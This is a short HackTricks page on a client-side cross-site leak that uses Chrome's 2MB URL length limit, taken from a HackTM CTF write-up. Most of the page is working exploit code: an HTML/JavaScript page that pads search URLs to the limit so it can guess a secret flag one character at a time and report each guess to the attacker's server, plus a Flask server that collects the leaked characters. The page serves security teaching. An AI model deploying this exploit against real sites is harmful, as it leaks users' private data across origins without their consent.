URL Max Length - Client Side

Reading time: 2 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Code from https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit

html
<html> <body></body> <script> ;(async () => { const curr = "http://secrets.wtl.pw/search?query=HackTM{" const leak = async (char) => { fetch("/?try=" + char) let w = window.open( curr + char + "#" + "A".repeat(2 * 1024 * 1024 - curr.length - 2) ) const check = async () => { try { w.origin } catch { fetch("/?nope=" + char) return } setTimeout(check, 100) } check() } const CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789" for (let i = 0; i < CHARSET.length; i++) { leak(CHARSET[i]) await new Promise((resolve) => setTimeout(resolve, 50)) } })() </script> </html>

Server side:

python
from flask import Flask, request app = Flask(__name__) CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789" chars = [] @app.route('/', methods=['GET']) def index(): global chars nope = request.args.get('nope', '') if nope: chars.append(nope) remaining = [c for c in CHARSET if c not in chars] print("Remaining: {}".format(remaining)) return "OK" @app.route('/exploit.html', methods=['GET']) def exploit(): return open('exploit.html', 'r').read() if __name__ == '__main__': app.run(host='0.0.0.0', port=1337)

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks